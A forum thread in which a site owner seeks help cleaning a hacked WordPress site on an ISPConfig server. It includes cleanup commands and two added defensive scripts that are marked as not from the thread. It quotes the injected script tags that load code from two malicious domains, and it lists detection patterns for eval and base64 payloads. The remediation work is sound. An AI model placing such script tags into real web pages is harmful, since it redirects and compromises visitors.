Wordpress site hacked on ISPConfig 3 server and automatically redirects to another site

Discussion in 'General' started by onastvar, May 2, 2020.

  1. onastvar

    onastvar Member

    One of the websites (WordPress) on the ISPConfig 3 server got hacked and automatically redirects to another site. I think it happened on 4/24/2020. I had set up daily backups on this website, so I cannot restore it with a clean version, because I realized late that the site was hacked. I purchased and ran ISP-PROTECT for the entire server, which did not find any malware for this website (/var/www/clients/client2/web16). Many PHP files have the following injection:

    <script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>

    Error log is currently 0kb. I had some odd jobs in /var/www which I killed/deleted, because the server was showing low resources.

    I'm trying to find out how to stop the bleeding and fix the website.
    I cannot access wp-admin or the website, it redirects.
    Thanks in advance, if anyone could help I would appreciate it.
    Also, if you need more details please let me know.
    Last edited: May 3, 2020
  2. Th0m

    Th0m ISPConfig Developer Staff Member ISPConfig Developer

    Did you change anything in the site settings? Sounds like SSL is disabled. You could search for:
    site:howtoforge.com wrong website shown
  3. onastvar

    onastvar Member

    No changes to any settings. SSL & Let's Encrypt SSL was checked under Sites > website 16
  4. Steini86

    Steini86 Active Member

    Have a look here: https://wordpress.org/support/topic/hacked-138/
    A solution to restore your site is given.
    Make sure when copy'n pasting the commands you have the right " and '
    Sometimes they get corrupted when copying.
    Be aware, that this only brings your site back and does not fix the initial problem. You should also consider that the attacker had access to your database and all your stored data / passwords of that user could be exposed.

    In general, for a hacked Wordpress site, follow: https://wordpress.org/support/article/faq-my-site-was-hacked/
    Last edited: May 3, 2020
  5. onastvar

    onastvar Member

    Thanks @Steini86
    I came across both pages you listed in your post, but had no luck accessing the WordPress backend.

    I'm not successful with the following command (I changed " and ')

    when I issue command:

    find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g” {} +

    I get


    I have to CTRL+C to exit from >

    As soon as I found out about the issue, I changed the passwords for FTP/DB. I don't see any users created in table wp_users, siteurl was correct in the wp_options table (viewing in phpMyAdmin).

    Any other suggestions?
  6. Steini86

    Steini86 Active Member

    The command has an opening ", but no closing. That is why you get this behavior.
    I am not really an expert, but you could try
    find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g”" {} +
    The alternative is to execute just find . -name "index.php" and edit each file by hand.
  7. onastvar

    onastvar Member

    Thanks again!

    When I issue:

    find . -name "index.php" -exec sed -i "s#<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>##g”" {} +

    I get

    sed: -e expression #1, char 94: unknown option to `s'

    find . -name "index.php"
    gives 150 index.php files within the website folder /var/www/clients/client2/web16/web
  8. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    There is a syntax error in the sed command, probably at or around character position 94 of the command.
    You must figure out how to fix that error; read the sed manual page or instructions from the Internet.
    Or use some programming or script language you do know, and program the character string search and replace with that.
  9. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    change the salts in wp-config.php
    change any author/editor/admin users' passwords (or make them change them) in wordpress.
    if you don't already, configure fail2ban to block too many failed login attempts on wp-login.php and xmlrpc.php
    (be careful with this config, the forgot password and register urls are appended as wp-login.php?******* so don't just block on the wp-login.php string, or it could block an ip for a single login failure.) or use wordfence or similar to do the same thing.
    if xmlrpc isn't needed/used on the site, then block/disable it and jetpack.
  10. Steini86

    Steini86 Active Member

    find . -name "index.php" -exec sed -i "s%<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>%%" {} +
    Warning: Untested! I would suggest copying one of the malicious files to a new folder and trying the script there.
    There are tons of sed tutorials out there and you can try your regular expressions here: https://regex101.com/
    Good luck!
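The sed command above works only where both tags sit next to each other and gives no record of what it changed. The script below is an added example, not code from the thread or from any of its posters: it lists every file under a web root that carries either marker domain (all file types, not only index.php, since the thread later finds the tags in ._index.php and .html files too), copies each one into a backup directory outside the web root, and then removes each tag on its own. It assumes GNU grep and sed, as found on a Debian/Ubuntu ISPConfig host; the function names and the sample file are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the thread: find and strip the injected <script>
# tags quoted in the posts above, keeping a copy of each touched file outside
# the web root first. Assumes GNU grep/sed; function names are this example's own.

# List files containing either marker domain. -r recurse, -l names only,
# -I skip binary files, -F fixed strings (dots in the domains stay literal).
find_infected() {
    grep -rlIF -e 'trackstatisticsss.com' -e 'stivenfernando.com' "$1" 2>/dev/null
}

# strip_injected_tags WEBROOT BACKUPDIR
# Copies each infected file to BACKUPDIR (preserving its path), then deletes
# the tags. The s command uses % as its delimiter so the URL's slashes need no
# escaping, and -E (extended regex) so the character classes read cleanly.
# Each tag is matched separately, so a file holding only one of them is
# cleaned as well. Prints the number of files modified.
strip_injected_tags() {
    root=$1 bak=$2
    find_infected "$root" | {
        n=0
        while IFS= read -r f; do
            mkdir -p "$bak/$(dirname "$f")"
            cp -p "$f" "$bak/$f"
            sed -E -i \
              "s%<script[^>]*src='https://[^']*(trackstatisticsss|stivenfernando)\.com[^']*'[^>]*></script>%%g" \
              "$f"
            n=$((n + 1))
        done
        echo "$n"
    }
}

# Stand-alone demo on a constructed copy of an infected index.php.
demo() {
    tmp=$(mktemp -d) bak=$(mktemp -d)
    printf '%s\n' "<?php" "// legitimate code" "?>" \
      "<script type='text/javascript' src='https://stat.trackstatisticsss.com/k.js?v=333'></script><script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>" \
      > "$tmp/index.php"
    echo "modified: $(strip_injected_tags "$tmp" "$bak") file(s)"
    echo "still infected: $(find_infected "$tmp" | wc -l)"
    cat "$tmp/index.php"
    rm -rf "$tmp" "$bak"
}
case "${1:-}" in demo) demo ;; esac
```

Run it with the argument `demo` to see it on the constructed file, or source it and call `strip_injected_tags /var/www/clients/client2/web16/web /root/quarantine` after testing on a copy, as Steini86 suggests. Running `find_infected` again afterwards should print nothing; the copies in the backup directory keep the original injected content for later review.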
  11. onastvar

    onastvar Member

    Steini86 likes this.
  12. Steini86

    Steini86 Active Member

    Could be caching issue. Have you tried with browser in private mode?
  13. onastvar

    onastvar Member

    Sorry no luck with browser in private mode, same issue, still redirects.
  14. Steini86

    Steini86 Active Member

    Then a redirect is still configured somewhere. You can search for the redirect, for example with grep:
    grep -rli "stivenfernando.com" /var/www/hackedWordpress/web
    It could also be in the hidden .htaccess files.

    You should extract your data and make a clean re-installation
  15. onastvar

    onastvar Member

    Thanks @Steini86
    I found 20 files "._index.php" and 15 files "awsindex.html", cleaned them, still redirects.
    How do I extract DATA?
    This site has the Bookly plugin for booking;
    besides that, it's pretty much a simple 5 page website.
  16. Steini86

    Steini86 Active Member

  17. onastvar

    onastvar Member

    I tried private mode, still redirects. I already checked 3 links you mention, they have no solution.
  18. till

    till Super Moderator Staff Member ISPConfig Developer

    Might be that the redirect has been injected in the database as well.
  19. nhybgtvfr

    nhybgtvfr Well-Known Member HowtoForge Supporter

    copy your uploads folder, wp-config.php, and .htaccess into /private.
    mysqldump your database into /private, use the --extended-insert=false option, makes it easier to read if you need to look at it manually.
    drop the database, create a new blank database.
    clear out /web of everything except the stats folder and the errors folder. make sure you delete all the hidden files as well.
    download and extract a clean wordpress to the original location.
    check wp-config.php and .htaccess files are clean, and move them back to their original location.
    run the same regex script you used on index.php on the database dump.
    check the database dump for strings like base64, eval, and decode.
    if there are any, check them carefully, they may be malicious, they may be legit. delete the malicious ones.
    copy the /private/uploads folder back into the wp-content folder
    to make sure all files/folders still have correct permissions and ownership, cd into /web and :
    find . -type d -exec chmod 755 {} \;
    find . -type f -exec chmod 644 {} \;
    chown -R <webid>:<clientid> .

    import the database
    re-install the wordpress theme and plugins.
    you should also check that everything in the errors and stats folders is clean as well.

    you may also want to consider running that regex against all the files, not just instances of index.php, or just php files.
    these bastards have a tendency to add these bits of script calls and base64 encoded shit all over the place, and to hide php script file as image files...:mad:
  20. onastvar

    onastvar Member

    Any advice on how to find the redirect injected in the database? In the wp_options table site_url is correct, and I tried searching the entire DB for "stivenfernando", nothing found.
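A plain search for the domain name in the dump, as done above, misses a payload that is stored base64-encoded, which is one way the "base64, eval, decode" check from post 19 applies to the database. The script below is an added example, not code from the thread or its posters: it makes a plain-text pass over a mysqldump for the two domains and common obfuscation constructs, then a second pass that pulls out every base64-looking run, decodes it and reports the line if the decoded text contains a URL or script tag. It assumes GNU grep and coreutils base64; the function names and the sample dump are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the thread: check a mysqldump for the injected
# redirect, including copies that a plain search for the domain misses because
# the payload is stored base64-encoded. Assumes GNU grep and coreutils base64;
# function names are this example's own.

# Plain-text pass: the two domains from the thread plus constructs often used
# to hide payloads in option values and post content. Hits on the second group
# are a review list, not proof of compromise (legitimate plugins use them too).
scan_dump_plain() {
    grep -nE "stivenfernando\.com|trackstatisticsss\.com|<script|base64_decode|eval\(|gzinflate" "$1" || true
}

# Encoded pass: extract every base64-looking run of 40+ characters, decode it
# and print "line:decoded" when the decoded text contains a URL or script tag.
# Hashes and tokens also match the character class but decode to binary noise
# and are therefore not reported.
scan_dump_base64() {
    grep -noE '[A-Za-z0-9+/]{40,}={0,2}' "$1" | while IFS=: read -r lineno blob; do
        decoded=$(printf '%s' "$blob" | base64 -d 2>/dev/null | tr -cd '[:print:]')
        case $decoded in
            *http*|*'<script'*) printf '%s:%s\n' "$lineno" "$decoded" ;;
        esac
    done
}

# Writes a constructed dump to FILE: a clean siteurl row, a row with a plain
# eval(base64_decode(...)) call (the blob is base64 of: echo 'hi';), a row
# holding the redirect tag base64-encoded so "stivenfernando" never appears in
# clear text, and a row with a hex hash that must not be reported.
make_sample_dump() {
    tag="<script type='text/javascript' src='https://ws.stivenfernando.com/stm?v=2.2.0'></script>"
    enc=$(printf '%s' "$tag" | base64 | tr -d '\n')
    {
        printf '%s\n' "-- constructed sample dump, not from a real site"
        printf '%s\n' "INSERT INTO wp_options VALUES (1,'siteurl','https://www.example.com','yes');"
        printf '%s\n' "INSERT INTO wp_options VALUES (2,'widget_text','<?php eval(base64_decode(\"ZWNobyAnaGknOw==\")); ?>','yes');"
        printf '%s\n' "INSERT INTO wp_options VALUES (3,'theme_footer_code','$enc','yes');"
        printf '%s\n' "INSERT INTO wp_options VALUES (4,'cache_key','3f0c1b2a9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2a','yes');"
    } > "$1"
}

# Stand-alone demo on the constructed dump.
demo() {
    tmp=$(mktemp -d)
    make_sample_dump "$tmp/dump.sql"
    echo "plain grep for the domain: $(grep -c stivenfernando "$tmp/dump.sql") line(s)"
    echo "plain indicators:"; scan_dump_plain "$tmp/dump.sql"
    echo "decoded base64 hits:"; scan_dump_base64 "$tmp/dump.sql"
    rm -rf "$tmp"
}
case "${1:-}" in demo) demo ;; esac
```

On the constructed dump the plain grep for the domain finds nothing, the first pass flags only the eval row, and the second pass reports the row whose decoded value is the redirect tag. Against a real dump, run both functions on the file produced with `--extended-insert=false` as advised above, and review each reported line in context before deleting anything, since serialized plugin settings can legitimately contain long base64 strings.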
